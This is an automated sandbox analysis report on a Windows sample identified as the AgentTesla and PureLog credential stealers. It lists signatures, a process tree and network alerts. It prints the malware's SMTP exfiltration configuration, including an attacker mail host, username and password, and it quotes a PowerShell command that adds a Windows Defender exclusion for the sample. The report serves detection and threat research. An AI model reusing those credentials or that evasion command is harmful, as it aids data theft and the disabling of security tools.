Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
20240328-REV2.exe

Overview

General Information

Sample name:20240328-REV2.exe
Analysis ID:1432024
MD5:ed1e2fd68e9de44ea4e01c7897f64411
SHA1:a42eb4e6084ac91d1fad3ef9fe01d8d3e9db0c26
SHA256:37109eb42fff729d1786ca4b676167f7acaa918a4abaf3bb465cfed6efa2b134
Tags:exe
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 20240328-REV2.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\20240328-REV2.exe" MD5: ED1E2FD68E9DE44EA4E01C7897F64411)
    • powershell.exe (PID: 6052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3772 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • 20240328-REV2.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\20240328-REV2.exe" MD5: ED1E2FD68E9DE44EA4E01C7897F64411)
    • WerFault.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1796 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1585065911.0000000006D50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000005.00000002.2743308776.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000001.00000002.1582368712.0000000003799000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.20240328-REV2.exe.6d50000.10.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                1.2.20240328-REV2.exe.6d50000.10.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  1.2.20240328-REV2.exe.3799970.8.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    1.2.20240328-REV2.exe.436e7a0.7.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      1.2.20240328-REV2.exe.4345780.6.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Click to see the 4 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\20240328-REV2.exe", ParentImage: C:\Users\user\Desktop\20240328-REV2.exe, ParentProcessId: 6840, ParentProcessName: 20240328-REV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", ProcessId: 6052, ProcessName: powershell.exe
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\20240328-REV2.exe", ParentImage: C:\Users\user\Desktop\20240328-REV2.exe, ParentProcessId: 6840, ParentProcessName: 20240328-REV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", ProcessId: 6052, ProcessName: powershell.exe
                        Sigma detected: Suspicious Outbound SMTP Connections
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\20240328-REV2.exe, Initiated: true, ProcessId: 4788, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49711
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\20240328-REV2.exe", ParentImage: C:\Users\user\Desktop\20240328-REV2.exe, ParentProcessId: 6840, ParentProcessName: 20240328-REV2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe", ProcessId: 6052, ProcessName: powershell.exe

                        Snort Signatures

                        Timestamp:04/26/24-10:06:31.436750
                        SID:2030171
                        Source Port:49711
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/26/24-10:06:31.436750
                        SID:2839723
                        Source Port:49711
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/26/24-10:06:31.436814
                        SID:2855542
                        Source Port:49711
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/26/24-10:06:31.436814
                        SID:2855245
                        Source Port:49711
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/26/24-10:06:31.436814
                        SID:2840032
                        Source Port:49711
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:04/26/24-10:06:31.436814
                        SID:2851779
                        Source Port:49711
                        Destination Port:587
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: http://mail.mbarieservicesltd.comAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: WmiPrvSE.exe.3772.10.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        Multi AV Scanner detection for domain / URL
                        Source: mail.mbarieservicesltd.comVirustotal: Detection: 5%Perma Link
                        Source: http://mail.mbarieservicesltd.comVirustotal: Detection: 5%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: 20240328-REV2.exeReversingLabs: Detection: 44%
                        Source: 20240328-REV2.exeVirustotal: Detection: 44%Perma Link
                        Machine Learning detection for sample
                        Source: 20240328-REV2.exeJoe Sandbox ML: detected
                        Source: 20240328-REV2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 20240328-REV2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: System.Data.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Accessibility.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Drawing.pdb\ source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Microsoft.VisualBasic.pdbSystem.Data.ni.dll< source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: XZW.pdb source: 20240328-REV2.exe, WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.pdbx source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.pdbSystem.Data.dll4 source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: XZW.pdbSHA256o source: 20240328-REV2.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Configuration.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Drawing.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.pdb, source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.8:49711 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.8:49711 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.8:49711 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.8:49711 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.8:49711 -> 199.79.62.115:587
                        Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.8:49711 -> 199.79.62.115:587
                        Source: global trafficTCP traffic: 192.168.2.8:49711 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                        Source: global trafficTCP traffic: 192.168.2.8:49711 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: 20240328-REV2.exe, 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: 20240328-REV2.exe, 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mbarieservicesltd.com
                        Source: 20240328-REV2.exe, 00000001.00000002.1581428931.000000000280D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_04D318081_2_04D31808
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_04D317F81_2_04D317F8
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_0534C5501_2_0534C550
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_0534E6F01_2_0534E6F0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA7A201_2_06EA7A20
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA9BC01_2_06EA9BC0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EACC181_2_06EACC18
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EAC9001_2_06EAC900
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA8D101_2_06EA8D10
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EABED01_2_06EABED0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA82A81_2_06EA82A8
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EAAA601_2_06EAAA60
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA87701_2_06EA8770
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA6F101_2_06EA6F10
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EAD8A81_2_06EAD8A8
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EABC881_2_06EABC88
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA00401_2_06EA0040
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EA00321_2_06EA0032
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EAF1481_2_06EAF148
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_06EAB9181_2_06EAB918
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_070B77481_2_070B7748
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_070B36181_2_070B3618
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_070B56C01_2_070B56C0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_070B2DA81_2_070B2DA8
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_070B4CC01_2_070B4CC0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_070BA1381_2_070BA138
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_070B31E01_2_070B31E0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_089539C01_2_089539C0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_08956CD81_2_08956CD8
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_08959CC81_2_08959CC8
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_0895A6881_2_0895A688
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_08959CB81_2_08959CB8
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_089572801_2_08957280
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_089572711_2_08957271
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_0895C3881_2_0895C388
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_0895A3F01_2_0895A3F0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_0895A3E01_2_0895A3E0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_0895C3781_2_0895C378
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 1_2_0895A67A1_2_0895A67A
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_00ED41405_2_00ED4140
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_00ED4D585_2_00ED4D58
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_00ED44885_2_00ED4488
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_0615A6C05_2_0615A6C0
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_0615EFB85_2_0615EFB8
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_0615DFEB5_2_0615DFEB
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_06157D205_2_06157D20
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_06158D985_2_06158D98
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_061552105_2_06155210
                        Source: C:\Users\user\Desktop\20240328-REV2.exeCode function: 5_2_061584CB5_2_061584CB
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1796
                        Source: 20240328-REV2.exe, 00000001.00000000.1493632755.00000000003AE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXZW.exe& vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1581428931.000000000280D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1580368727.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1586570461.0000000007622000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1587945175.000000000B0E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000005.00000002.2743308776.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs 20240328-REV2.exe
                        Source: 20240328-REV2.exe, 00000005.00000002.2743688093.00000000008F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 20240328-REV2.exe
                        Source: 20240328-REV2.exeBinary or memory string: OriginalFilenameXZW.exe& vs 20240328-REV2.exe
                        Source: 20240328-REV2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 20240328-REV2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, DqO3BeEpxTFOeAX25D.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.csSecurity API names: _0020.SetAccessControl
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.csSecurity API names: _0020.AddAccessRule
                        Source: 1.2.20240328-REV2.exe.27f6814.5.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 1.2.20240328-REV2.exe.2a18018.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 1.2.20240328-REV2.exe.27e6474.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 1.2.20240328-REV2.exe.6d80000.11.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/11@1/1
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20240328-REV2.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6840
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tckzrrwj.5ng.ps1Jump to behavior
                        Source: 20240328-REV2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 20240328-REV2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: 20240328-REV2.exeReversingLabs: Detection: 44%
                        Source: 20240328-REV2.exeVirustotal: Detection: 44%
                        Source: unknownProcess created: C:\Users\user\Desktop\20240328-REV2.exe "C:\Users\user\Desktop\20240328-REV2.exe"
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Users\user\Desktop\20240328-REV2.exe "C:\Users\user\Desktop\20240328-REV2.exe"
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 1796
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Users\user\Desktop\20240328-REV2.exe "C:\Users\user\Desktop\20240328-REV2.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeSection loaded: version.dllJump to behavior
